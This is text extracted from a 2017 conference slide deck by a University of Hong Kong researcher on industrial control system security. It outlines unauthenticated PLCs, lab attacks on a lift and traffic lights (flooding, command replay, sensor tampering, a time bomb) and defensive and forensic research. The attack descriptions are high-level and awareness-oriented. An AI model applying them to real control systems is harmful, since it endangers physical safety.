Cyber Security Research on Industrial Control Systems SM Yiu - - PowerPoint PPT Presentation

Cyber Security Research on Industrial Control Systems

SM Yiu Department of Computer Science The University of Hong Kong

1

Cyber-security for industry 4.0 conference 23 June, 2017

2

Will the followings only be seen in movies?

Movies: Cyber Hacking (2015); Italian Job (2003)

3

IT IS REAL!

(Defcon Hacking conference 2014)

4

2016 (US): 295 reports of ICS attacks (20% ) Mar: New York dam (control system accessed) April: German nuclear power plant (malware) Light-rail system, ….

5

The purpose of the talk is to raise the awareness of the community on the security issues of ICS.

6

Key components of an ICS

(Guide to Industrial Control System (ICS) Security, NIST, 2015)

7

Numerous attack points SCADA – a typical ICS

(Guide to Industrial Control System (ICS) Security, NIST, 2015)

8

PLC (programmable logic controller)

• A small digital computer used for

automation of various electro- mechanical process in industries.

• Specially designed to

survive in harsh conditions

• Programs can be written in a computer and

downloaded to PLC via a communication link (e.g. cable)

• “hard” real-time system: output produced in

response to input conditions within limited time.

9

Is PLC critical? In what systems they are used?

10

Yueng Long Sewage Treatment system

11

Ventilation Control and Monitoring System for Tunnel of subway/railway

(pictures from MTR report)

How easy to hack in PLC?

• PLC are NOT secure:
• PLC has no proper protection

built in, no authentication nor encryption for the communication protocol.

• Able to discover PLC by

packet sniffing.

12

Touch panel for floor selection PLC to control the lift

A Touch panel to control the lift

Sensor to detect the current floor

Switch that connects the PLC and Touch Panel

The PLC that controls the Lift system

Attack to the Lift System

19

Hacker

Connect to the PLC and control the lift directly NO authentication

Q: Some engineers feel that it is not easy to connect to it because it is a “closed” system, do you agree? Network capability

Five attacks (4 with demos)

• 1. DoS attack

– 100 MB/s is already enough to disable PLC to receive any valid commands – No advanced hacking knowledge needed. Packet generation program – free from Internet

• 2. Command injection attack

– We connect to PLC directly and generate random commands to PLC – A little bit more knowledge needed: replay attack!

• 3. Control the lift

– Take control of the PLC, attacker can

• rder to lift to whatever level.

– Understand the commands from touch panel to PLC.

• 4. Manipulate the sensor values

–Actively modify the sensor values –More knowledge about the sensor variables stored in PLC

• 5. Time bomb: hack the traffic lights

– Build a time bomb to turn both lights for cars and pedestrian green at the same time ONCE A WHILE.

25

Again, a real case in US (Dec 2015).

They examined the traffic light and performed forensic analysis on the PLC …........

26

Surprisingly…..

Event/log Date/time Program last modified Dec 08 2015 3:05pm Program last compiled Dec 08 2015 5:46pm Program last uploaded (by engineer) Dec 08 2015 5:46pm Program last uploaded (by ????) Dec 26 2015 4:18am Accident Dec 26 2015 pm

27

What we can do (our research directions besides attack) ?

• Build a protection layer

* Difficulty: low processing power, limited memory/buffer of PLC.

• Add-in a forensic module

* For detection and investigation.

28

Building a protection layer

…....... E.g. firewall (i) (ii) Light-weight detection module inside the PLC. Remark: We also have some interesting methods to do forensics (e.g. how to log the events with limited buffers/power)

29

Acknowledgements

<Thank you>

• Dr. KP Chow, leader of our research group

Our talented research students/engineers

• Raymond Chan *
• Chun Fai Chan, Ken Yau
• Han Yu, Bo Zhang, Yuan Zhang

Our partner: Cisco

** We are more than willing to collaborate with industry for related R&D problems ** Alex Choy, PolyU